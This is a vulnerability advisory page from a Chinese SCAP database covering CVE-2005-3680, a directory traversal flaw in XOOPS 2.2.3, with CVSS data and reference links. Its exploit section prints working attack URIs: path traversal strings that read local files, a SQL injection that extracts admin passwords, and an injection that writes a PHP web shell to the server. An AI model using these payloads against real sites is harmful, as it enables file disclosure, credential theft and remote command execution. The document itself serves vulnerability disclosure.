CVE-2005-3680
CVSS6.4
发布时间 :2005-11-18 18:03:00
修订时间 :2016-10-17 23:36:48
NMCOS    

[原文]Directory traversal vulnerability in editor_registry.php in XOOPS 2.2.3 allows remote attackers to read or include arbitrary local files via a .. (dot dot) in the xoopsConfig[language] parameter.


[CNNVD]XOOPS editor_registry.php页面目录遍历漏洞(CNNVD-200511-247)

        Xoops是非常流行的动态Web内容管理系统,用面向对象的PHP编写。
        XOOPS 2.2.3中的editor_registry.php页面存在目录遍历漏洞,这会允许远程攻击者通过在xoopsConfig[language]参数中的一个".."(参数中包含'..')来读取或包含任意的本地文件。

- CVSS (基础分值)

CVSS分值: 6.4 [中等(MEDIUM)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3680
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-3680
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200511-247
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=113199244824660&w=2
(UNKNOWN)  BUGTRAQ  20051112 XOOPS 2.2.3 Final arbitrary local inclusion / XOOPS WF-Downloads
http://www.securityfocus.com/bid/15406/
(UNKNOWN)  BID  15406
http://www.vupen.com/english/advisories/2005/2428
(UNKNOWN)  VUPEN  ADV-2005-2428

- 漏洞信息

XOOPS editor_registry.php页面目录遍历漏洞
中危 路径遍历
2005-11-18 00:00:00 2005-11-30 00:00:00
远程  
        Xoops是非常流行的动态Web内容管理系统,用面向对象的PHP编写。
        XOOPS 2.2.3中的editor_registry.php页面存在目录遍历漏洞,这会允许远程攻击者通过在xoopsConfig[language]参数中的一个".."(参数中包含'..')来读取或包含任意的本地文件。

- 公告与补丁

        暂无数据

- 漏洞信息

20853
XOOPS textarea/editor_registry.php xoopsConfig[language] Parameter Traversal Arbitrary File Access
Remote / Network Access Input Manipulation

- 漏洞描述

Unknown or Incomplete

- 时间线

2005-11-12 Unknow
2005-11-12 Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

XOOPS Multiple Input Validation Vulnerabilities
Input Validation Error 15406
Yes No
2005-11-14 12:00:00 2009-07-12 05:56:00
retrogod@aliceposta.it is credited with the discovery of this vulnerability.

- 受影响的程序版本

Xoops Xoops 2.2.3
SmartFactory WF-Downloads 2.0.5

- 漏洞讨论

XOOPS is prone to multiple input validation vulnerabilities.

XOOPS is prone to a directory traversal vulnerability. This is due to a lack of proper sanitization of user-supplied input.

XOOPS is prone to an SQL injection vulnerability. This is due to a lack of proper sanitization of user-supplied input before being used in SQL queries.

Successful exploitation could result in a compromise of the application, disclosure or modification of data. An attacker may also be able to exploit this vulnerability to execute arbitrary commands.

- 漏洞利用

No exploit is required.

Example URIs have been provided:

http://www.example.com/[path_to_xoops]/class/xoopseditor/textarea/editor_registry.php?xoopsConfig[lang
uage]=../../../../../../../../../../script
http://www.example.com/[path_to_xoops]/class/xoopseditor/textarea/editor_registry.php?xoopsConfig[lang
uage]=../../../../../../../../../../boot.ini%00
http://www.example.com/[path_to_xoops]/class/xoopseditor/koivi/editor_registry.php?xoopsConfig[languag
e]=../../../../../../../../../../script
http://www.example.com/[path_to_xoops]/class/xoopseditor/koivi/editor_registry.php?xoopsConfig[languag
e]=../../../../../../../../../../boot.ini%00
http://www.example.com/[path_to_xoops]/class/xoopseditor/dhtmltextarea/editor_registry.php?xoopsConfig
[language]=../../../../../../../../../../script
http://www.example.com/[path_to_xoops]/class/xoopseditor/dhtmltextarea/editor_registry.php?xoopsConfig
[language]=../../../../../../../../../../boot.ini%00

http://www.example.com/[path_to_xoops]/modules/wfdownloads/viewcat.php?list=-'%20UNION%20SELECT%200,0,
loginname,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,pass,0,0%20FROM%20fXZtr_users%20WHERE%20level=5/*

http://www.example.com/[path_to_xoops]/modules/wfdownloads/viewcat.php?list=-1'%20or'a'='a'%20UNION%20
SELECT%200,0,0,'<?php%20system($_GET[cmd]);?>',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0%20INTO%20OUTFILE%20'../../www/xoops/uploads/shell.php'%20FROM%20fXZtr_wfdownloads_downloads/*

- 解决方案

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站